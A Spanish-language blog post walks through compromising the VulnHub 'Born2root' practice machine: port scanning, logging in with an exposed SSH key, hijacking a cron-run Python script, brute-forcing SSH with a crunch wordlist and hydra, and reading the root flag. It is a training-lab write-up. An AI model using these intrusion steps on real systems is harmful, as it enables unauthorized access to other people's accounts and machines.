sábado, 21 de abril de 2018

Solución al reto Born2root

Hola amigos.

Hoy, vamos a ver cómo podemos resolver el reto born2root, descargable en https://www.vulnhub.com/entry/born2root-1,197/#

La dirección de la máquina víctima será 192.168.1.70

En primer lugar, escaneamos los puertos y vemos los servicios:

nmap -sS -sV -O 192.168.1.70



Bien, veamos la página web



Vemos que el correo de uno de ellos es martin@secretsec.com. Bien, eso significa, que los usuarios es posible que sean martin, hadi y jimmy.

Estudiaremos los directorios de la página web.





en el directorio /icons nos encontramos lo siguiente:



Nos llama la atención el fichero VDSoyuAXiO.txt. 

Nos lo descargamos.

Ponemos

chmod 600 VDSoyAXiO.txt

porque si no, nos saldrá un error como se muestra a continuación:



ssh -i VDSoyuAXiO.txt martin@192.168.1.70

(probamos martin por probar, si no lo fuese, serían o hadi o jimmy)



Introducimos cualquier contraseña



Si ponemos

nano /etc/crontab




/etc/crontab es un archivo que indica al sistema tareas que realizar automáticamente. Es decir, le puedes programar que, por ejemplo, todos los lunes, a las 17:30, haga algo.

Vemos que, cada cinco minutos, se ejecuta el script /tmp/sekurity.py para el usuario jimmy. ¿Y si cambiamos ese script por otro que sea nuestro?

Crearemos un script en python

nano /tmp/sekurity.py

Y ponemos:

import os
os.system(“chmod 777 -R /home/jimmy”)

guardamos y cerramos.

Con este código, tendremos permisos en el directorio /home/jimmy

chmod es el encargado de dar permisos en linux:
  • Permiso de lectura: 4
  • Permiso de escritura: 2
  • Permiso de ejecución: 1
Como queremos todos los permisos, 4+2+1 =7

Y ponemos un 7 para el usuario, un 7 para el grupo, y un 7 para el resto, con lo cual nos queda chmod 777

Ahora, ponemos un -R para indicar que se va a aplicar a todos los archivos y subcarpetas de /home/jimmy

Guardamos y cerramos.

Esperamos 5 minutos.



Y ya podemos entrar en el directorio de jimmy.
 
Vamos a preparar un diccionario para hadi.

En otra ventana ponemos

crunch 5 5 -t hadi% > hadi1.txt

crunch 6 6 -t hadi%% > hadi2.txt

crunch 7 7 -t hadi%%% > hadi3.txt

Unimos los archivos (concatenamos) de la siguiente manera:

cat hadi*.txt > hadi.txt

Y ya tenemos un diccionario de los tres anteriores.

Ahora, usamos la fuerza bruta.

hydra -l hadi -P hadi.txt 192.168.1.70 ssh



Iniciamos sesión


Y como contraseña hadi123




Probamos

su

Cuando pida la contraseña ponemos hadi123



Resulta que hadi es el administrador.

Y si vamos al directorio /root/, nos encontramos la flag.txt

cat flag.txt


Publicado por en
Etiquetas: , , , , , , , ,

No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Suscribirse a: Enviar comentarios (Atom)